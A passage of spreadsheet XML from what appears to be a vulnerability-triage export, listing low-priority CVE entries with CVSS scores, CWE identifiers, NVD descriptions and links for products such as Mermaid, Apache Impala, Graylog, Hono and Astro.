      <c r="A2034" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2034" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50159</t>
        </is>
      </c>
      <c r="C2034" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2034" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2034" s="5" t="inlineStr"/>
      <c r="F2034" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2034" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2034" s="5" t="inlineStr"/>
      <c r="I2034" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J2034" s="5" t="inlineStr"/>
      <c r="K2034" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L2034" s="5" t="inlineStr">
        <is>
          <t>Mermaid is a JavaScript tool that uses Markdown-inspired text to create and modify diagrams and charts. Prior to 10.9.8 and 11.16.1, Mermaid is vulnerable to CSS injection via sibling combinator selectors generated from diagram-supplied class or id names. An attacker who can supply diagram text can inject arbitrary CSS into the rendered page, potentially altering the appearance or behavior of unrelated page elements. This issue is fixed in versions 10.9.8 and 11.16.1.</t>
        </is>
      </c>
      <c r="M2034" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50159</t>
        </is>
      </c>
    </row>
    <row r="2035">
      <c r="A2035" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2035" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54048</t>
        </is>
      </c>
      <c r="C2035" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2035" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2035" s="5" t="inlineStr"/>
      <c r="F2035" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2035" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H2035" s="5" t="inlineStr">
        <is>
          <t>apache:impala</t>
        </is>
      </c>
      <c r="I2035" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2035" s="5" t="inlineStr"/>
      <c r="K2035" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2035" s="5" t="inlineStr">
        <is>
          <t>Specifying tblproperties('avro.schema.url'=' http://...' ) or with a 'file:///' URI on a table in Impala 2.0.0 to 4.5.1 on all platforms allows an attacker to trigger a GET request to internal endpoints they may not have access to but that Impala does and the response my be exposed via parsing error messages.
Users are recommended to upgrade to version 4.5.2, which fixes this issue.</t>
        </is>
      </c>
      <c r="M2035" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54048</t>
        </is>
      </c>
    </row>
    <row r="2036">
      <c r="A2036" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2036" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55619</t>
        </is>
      </c>
      <c r="C2036" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2036" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2036" s="5" t="inlineStr"/>
      <c r="F2036" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2036" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2036" s="5" t="inlineStr"/>
      <c r="I2036" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J2036" s="5" t="inlineStr"/>
      <c r="K2036" s="5" t="inlineStr">
        <is>
          <t>CWE-1124, CWE-770</t>
        </is>
      </c>
      <c r="L2036" s="5" t="inlineStr">
        <is>
          <t>eml_parser serves as a python module for parsing eml files and returning various information found in the e-mail as well as computed information. Prior to 3.0.2, eml_parser.parser.HeaderParser.header_fetch_parse in eml_parser/parser.py uses email.utils.getaddresses() to parse address-bearing e-mail headers. A deeply nested CFWS comment construct exhausts the standard-library recursive descent parser's call stack and raises RecursionError, which is not caught and therefore aborts parsing of the entire message. An attacker can disrupt SOC pipelines that process untrusted EML files, although callers already need to handle exceptions from malformed or pathological messages. This issue is fixed in version 3.0.2.</t>
        </is>
      </c>
      <c r="M2036" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55619</t>
        </is>
      </c>
    </row>
    <row r="2037">
      <c r="A2037" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2037" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55867</t>
        </is>
      </c>
      <c r="C2037" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2037" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2037" s="5" t="inlineStr"/>
      <c r="F2037" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2037" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2037" s="5" t="inlineStr"/>
      <c r="I2037" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J2037" s="5" t="inlineStr"/>
      <c r="K2037" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L2037" s="5" t="inlineStr">
        <is>
          <t>Graylog is a free and open log management platform. From 6.2.0 until 6.3.12, 7.0.7, and 7.1.2, the DELETE /users/{userId}/tokens/{idOrToken} endpoint implemented by UsersResource.revokeToken() in graylog2-server/src/main/java/org/graylog2/rest/resources/users/UsersResource.java checks USERS_TOKENREMOVE permission against the attacker-controlled userId path parameter before resolving the token selected by idOrToken. An authenticated user can provide an authorized userId while accessTokenService.loadById() or accessTokenService.load() resolves a token belonging to another user, including a service account or administrator, after which accessTokenService.destroy() deletes that token without checking AccessToken.getUserName(). The issue does not expose token contents, but unauthorized deletion causes integrity impact and can disrupt access-token-based integrations. This issue is fixed in versions 6.3.12, 7.0.7, and 7.1.2.</t>
        </is>
      </c>
      <c r="M2037" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55867</t>
        </is>
      </c>
    </row>
    <row r="2038">
      <c r="A2038" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2038" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56704</t>
        </is>
      </c>
      <c r="C2038" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2038" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2038" s="5" t="inlineStr"/>
      <c r="F2038" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2038" s="5" t="inlineStr">
        <is>
          <t>java, mysql</t>
        </is>
      </c>
      <c r="H2038" s="5" t="inlineStr"/>
      <c r="I2038" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J2038" s="5" t="inlineStr"/>
      <c r="K2038" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2038" s="5" t="inlineStr">
        <is>
          <t>Adminer before 5.4.3 inserts unsanitized database server version strings into script tags with valid CSP nonces without proper validation. Attackers controlling a rogue MySQL server can return crafted version strings that break out of the JavaScript context and execute arbitrary code, bypassing Content Security Policy protections.</t>
        </is>
      </c>
      <c r="M2038" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56704</t>
        </is>
      </c>
    </row>
    <row r="2039">
      <c r="A2039" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2039" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61632</t>
        </is>
      </c>
      <c r="C2039" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2039" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2039" s="5" t="inlineStr"/>
      <c r="F2039" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2039" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2039" s="5" t="inlineStr"/>
      <c r="I2039" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J2039" s="5" t="inlineStr"/>
      <c r="K2039" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2039" s="5" t="inlineStr">
        <is>
          <t>PyMdown Extensions is a set of extensions for the Python-Markdown markdown project. In versions up to and including 10.21.3, the b64 extension is vulnerable to a path traversal that discloses arbitrary files: it inlines images referenced by &lt;img src="..."&gt; by joining the src onto the configured base_path with os.path.normpath and opening the result directly, without verifying that the resolved path stays inside base_path. As a result, an src containing ../ sequences or an absolute path reads a file outside base_path as long as it has an allowed image extension (.png, .jpg, .jpeg, .gif, .svg), and the file's contents are then base64-encoded into the rendered output, disclosing them. An application that renders untrusted Markdown with pymdownx.b64 enabled can therefore leak the contents of image-extension files readable by the process to whoever controls the Markdown or views the output, a targeted file-read bounded by the extension check. This issue has been fixed in version 11.0.</t>
        </is>
      </c>
      <c r="M2039" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61632</t>
        </is>
      </c>
    </row>
    <row r="2040">
      <c r="A2040" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2040" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66778</t>
        </is>
      </c>
      <c r="C2040" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2040" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2040" s="5" t="inlineStr"/>
      <c r="F2040" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2040" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H2040" s="5" t="inlineStr">
        <is>
          <t>sap:approuter</t>
        </is>
      </c>
      <c r="I2040" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2040" s="5" t="inlineStr"/>
      <c r="K2040" s="5" t="inlineStr">
        <is>
          <t>CWE-644</t>
        </is>
      </c>
      <c r="L2040" s="5" t="inlineStr">
        <is>
          <t>SAP Approuter does not sufficiently sanitize certain request headers before forwarding traffic to internal components. An unauthenticated attacker could send a specially crafted request to obtain limited unauthorized access to information. This results in a low impact on confidentiality. There is no impact on integrity and availability.</t>
        </is>
      </c>
      <c r="M2040" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66778</t>
        </is>
      </c>
    </row>
    <row r="2041">
      <c r="A2041" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2041" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69207</t>
        </is>
      </c>
      <c r="C2041" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2041" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2041" s="5" t="inlineStr"/>
      <c r="F2041" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2041" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2041" s="5" t="inlineStr"/>
      <c r="I2041" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J2041" s="5" t="inlineStr"/>
      <c r="K2041" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="L2041" s="5" t="inlineStr">
        <is>
          <t>Hono is a Web application framework that provides support for any JavaScript runtime. Prior to 4.12.34, the built-in CORS middleware, hono/cors, is vulnerable to a regular expression denial of service (ReDoS). During a preflight OPTIONS request, the middleware parses the attacker-controlled Access-Control-Request-Headers header using a whitespace-tolerant regular expression whose backtracking makes its running time quadratic in the input length. Because the header value is bounded only by the deployment's maximum HTTP header size, a single preflight carrying a long run of whitespace can consume seconds of CPU and block request processing. On runtimes that share one execution thread across requests, this stalls concurrent requests as well, and repeated requests can render the service unresponsive. This affects the default configuration, since the vulnerable path is reached whenever cors() is used with an unset or empty allowHeaders. Applications that set a non-empty allowHeaders are not affected. This issue is fixed in version 4.12.34.</t>
        </is>
      </c>
      <c r="M2041" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69207</t>
        </is>
      </c>
    </row>
    <row r="2042">
      <c r="A2042" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2042" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70466</t>
        </is>
      </c>
      <c r="C2042" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2042" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2042" s="5" t="inlineStr"/>
      <c r="F2042" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2042" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="H2042" s="5" t="inlineStr">
        <is>
          <t>fortinet:fortiweb</t>
        </is>
      </c>
      <c r="I2042" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J2042" s="5" t="inlineStr"/>
      <c r="K2042" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="L2042" s="5" t="inlineStr">
        <is>
          <t>A incomplete list of disallowed inputs vulnerability in Fortinet FortiWeb 8.0.0 through 8.0.2, FortiWeb 7.6.0 through 7.6.5, FortiWeb 7.4 all versions, FortiWeb 7.2 all versions, FortiWeb 7.0 all versions may allow attacker to improper access control via &lt;insert attack vector here&gt;</t>
        </is>
      </c>
      <c r="M2042" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70466</t>
        </is>
      </c>
    </row>
    <row r="2043">
      <c r="A2043" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2043" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70575</t>
        </is>
      </c>
      <c r="C2043" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2043" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2043" s="5" t="inlineStr"/>
      <c r="F2043" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2043" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2043" s="5" t="inlineStr"/>
      <c r="I2043" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2043" s="5" t="inlineStr"/>
      <c r="K2043" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L2043" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows Schannel allows an authorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M2043" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70575</t>
        </is>
      </c>
    </row>
    <row r="2044">
      <c r="A2044" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2044" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70607</t>
        </is>
      </c>
      <c r="C2044" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2044" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2044" s="5" t="inlineStr"/>
      <c r="F2044" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2044" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2044" s="5" t="inlineStr"/>
      <c r="I2044" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J2044" s="5" t="inlineStr"/>
      <c r="K2044" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L2044" s="5" t="inlineStr">
        <is>
          <t>Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to 39.8.8, 40.9.0, 41.2.1, and 42.0.0-beta.3, some window options supplied by web content in the window.open() features string were applied to the new BrowserWindow without an allowlist. Untrusted content could set window options it should not control, including options that cause the main process to access attacker-chosen file or network paths, when untrusted content can call window.open() and the app does not override child window options via setWindowOpenHandler or overrideBrowserWindowOptions. This issue is fixed in 39.8.8, 40.9.0, 41.2.1, and 42.0.0-beta.3.</t>
        </is>
      </c>
      <c r="M2044" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70607</t>
        </is>
      </c>
    </row>
    <row r="2045">
      <c r="A2045" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2045" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71216</t>
        </is>
      </c>
      <c r="C2045" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2045" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2045" s="5" t="inlineStr"/>
      <c r="F2045" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2045" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H2045" s="5" t="inlineStr"/>
      <c r="I2045" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2045" s="5" t="inlineStr"/>
      <c r="K2045" s="5" t="inlineStr">
        <is>
          <t>CWE-319</t>
        </is>
      </c>
      <c r="L2045" s="5" t="inlineStr">
        <is>
          <t>PagerDuty alarm hook transmits the integration routing key over cleartext HTTP.
PagerDuty serves this endpoint over HTTPS and will
normally answer plain HTTP with a redirect. That does not remove the exposure.
The initial POST -- including the JSON body containing the routing key -- is
written to the socket unencrypted before any redirect response is received.
Redirection affects only whether the request is retried securely, not whether
the first copy left the host in the clear.
This issue affects Apache SkyWalking: from 9.6.0 through 11.0.0.
Users are recommended to upgrade to version 11.0.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M2045" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71216</t>
        </is>
      </c>
    </row>
    <row r="2046">
      <c r="A2046" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2046" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71408</t>
        </is>
      </c>
      <c r="C2046" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2046" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2046" s="5" t="inlineStr"/>
      <c r="F2046" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2046" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="H2046" s="5" t="inlineStr">
        <is>
          <t>fortinet:fortios</t>
        </is>
      </c>
      <c r="I2046" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J2046" s="5" t="inlineStr"/>
      <c r="K2046" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L2046" s="5" t="inlineStr">
        <is>
          <t>A allocation of resources without limits or throttling vulnerability in Fortinet FortiOS 7.6.0 through 7.6.6, FortiOS 7.4 all versions, FortiOS 7.2 all versions may allow attacker to denial of service via &lt;insert attack vector here&gt;</t>
        </is>
      </c>
      <c r="M2046" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71408</t>
        </is>
      </c>
    </row>
    <row r="2047">
      <c r="A2047" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2047" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71436</t>
        </is>
      </c>
      <c r="C2047" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2047" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2047" s="5" t="inlineStr"/>
      <c r="F2047" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2047" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2047" s="5" t="inlineStr"/>
      <c r="I2047" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J2047" s="5" t="inlineStr"/>
      <c r="K2047" s="5" t="inlineStr">
        <is>
          <t>CWE-1325, CWE-835</t>
        </is>
      </c>
      <c r="L2047" s="5" t="inlineStr">
        <is>
          <t>Mermaid is a JavaScript tool that uses Markdown-inspired text to create and modify diagrams and charts. From version 10.6.0 until 10.9.8 and 11.16.1, Mermaid XY Charts are vulnerable to an infinite loop denial of service in the setXAxisRangeData function when configuring an X-Axis with invalid parameters. Because each loop iteration appends an element to an array, this generally causes a RangeError to appear after a few seconds, but it may instead cause the page or JavaScript process to crash from memory exhaustion, depending on the environment. This issue is fixed in versions 10.9.8 and 11.16.1.</t>
        </is>
      </c>
      <c r="M2047" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71436</t>
        </is>
      </c>
    </row>
    <row r="2048">
      <c r="A2048" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2048" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71439</t>
        </is>
      </c>
      <c r="C2048" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2048" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2048" s="5" t="inlineStr"/>
      <c r="F2048" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2048" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2048" s="5" t="inlineStr"/>
      <c r="I2048" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J2048" s="5" t="inlineStr"/>
      <c r="K2048" s="5" t="inlineStr">
        <is>
          <t>CWE-1322, CWE-606</t>
        </is>
      </c>
      <c r="L2048" s="5" t="inlineStr">
        <is>
          <t>Mermaid is a JavaScript tool that uses Markdown-inspired text to create and modify diagrams and charts. From version 11.6.0 until 11.16.1, Mermaid Radar Diagrams allow arbitrary large values for the ticks parameter, which can cause high CPU usage and freeze the rendering webpage or JavaScript process for long periods of time, potentially until the process is killed from memory exhaustion. This issue is fixed in version 11.16.1.</t>
        </is>
      </c>
      <c r="M2048" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71439</t>
        </is>
      </c>
    </row>
    <row r="2049">
      <c r="A2049" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2049" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71848</t>
        </is>
      </c>
      <c r="C2049" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2049" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2049" s="5" t="inlineStr"/>
      <c r="F2049" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2049" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2049" s="5" t="inlineStr"/>
      <c r="I2049" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J2049" s="5" t="inlineStr"/>
      <c r="K2049" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="L2049" s="5" t="inlineStr">
        <is>
          <t>Hono is a Web application framework that provides support for any JavaScript runtime. From 4.12.0 to 4.12.33, the languageDetector middleware is vulnerable to algorithmic complexity denial of service when processing a crafted language tag containing a large number of hyphen separated subtags. To implement progressive language tag truncation, normalizeLanguage() repeatedly calls parts.slice(0, i).join('-') for every possible prefix, so the total amount of string processing grows quadratically with the number of subtags. Language values may come from a query parameter, cookie, Accept-Language header, or URL path, depending on the detector configuration, and the default detector order enables query string, cookie, and header detection, so applications using languageDetector() may expose this processing to unauthenticated requests. An attacker may repeatedly send requests containing long, hyphen separated language tags, causing excessive CPU consumption and preventing unrelated requests from being processed. This issue is fixed in version 4.12.34.</t>
        </is>
      </c>
      <c r="M2049" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71848</t>
        </is>
      </c>
    </row>
    <row r="2050">
      <c r="A2050" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2050" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72834</t>
        </is>
      </c>
      <c r="C2050" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2050" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2050" s="5" t="inlineStr"/>
      <c r="F2050" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2050" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H2050" s="5" t="inlineStr"/>
      <c r="I2050" s="5" t="inlineStr">
        <is>
          <t>2026-08-14</t>
        </is>
      </c>
      <c r="J2050" s="5" t="inlineStr"/>
      <c r="K2050" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L2050" s="5" t="inlineStr">
        <is>
          <t>filebrowser before 2.63.19 contains a permission bypass in the /api/resources endpoint. The checksum (?checksum=) branch of resourceGetHandler reads the entire file to compute a digest and returns it without performing a Perm.Download check (unlike the sibling raw, preview, and subtitle paths). As a result, an authenticated user provisioned with Perm.Download=false can obtain a content-hash oracle for any same-scope file (md5/sha1/sha256/sha512), enabling confirmation of known/guessed content, change detection, and offline brute-force of low-entropy files. This is an incomplete fix of CVE-2026-35606; it bypasses only the Download permission and does not defeat scope/path authorization.</t>
        </is>
      </c>
      <c r="M2050" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72834</t>
        </is>
      </c>
    </row>
    <row r="2051">
      <c r="A2051" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2051" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73244</t>
        </is>
      </c>
      <c r="C2051" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2051" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2051" s="5" t="inlineStr"/>
      <c r="F2051" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2051" s="5" t="inlineStr">
        <is>
          <t>java, spring</t>
        </is>
      </c>
      <c r="H2051" s="5" t="inlineStr"/>
      <c r="I2051" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2051" s="5" t="inlineStr"/>
      <c r="K2051" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2051" s="5" t="inlineStr">
        <is>
          <t>kkFileView is a universal file online preview project based on Spring Boot. Prior to 5.0.1, the unauthenticated POST /listFiles endpoint in server/src/main/java/cn/keking/web/controller/FileController.java passes the user-controlled path parameter from FileController#getFiles to Files.newDirectoryStream without confinement to the demo directory, allowing directory enumeration outside the intended root. This issue is fixed in version 5.0.1.</t>
        </is>
      </c>
      <c r="M2051" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73244</t>
        </is>
      </c>
    </row>
    <row r="2052">
      <c r="A2052" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2052" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73422</t>
        </is>
      </c>
      <c r="C2052" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="D2052" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2052" s="5" t="inlineStr"/>
      <c r="F2052" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2052" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2052" s="5" t="inlineStr"/>
      <c r="I2052" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J2052" s="5" t="inlineStr"/>
      <c r="K2052" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2052" s="5" t="inlineStr">
        <is>
          <t>Astro is a web framework for content-driven websites. From 2.9.0 until 7.1.0, Astro's server-side View Transition CSS generator interpolates animation properties into an inline style element without escaping them for CSS and HTML contexts. An attacker-controlled View Transition animation value such as duration can terminate the generated style element and inject arbitrary HTML or JavaScript. The affected code is packages/astro/src/runtime/server/transition.ts; renderTransition passes sheet.toString() into markHTMLString(), while addAnimationProperty serializes duration through toTimeValue() and also handles easing, direction, delay, fillMode, and name. Exploitation requires an on-demand or server-rendered route to pass attacker-controlled data into a View Transition animation definition and can execute arbitrary JavaScript in the affected application's origin, allowing access to sensitive page data and authenticated actions available to the victim. This issue is fixed in version 7.1.0.</t>
        </is>
      </c>
      <c r="M2052" s="6" t="inlineStr">
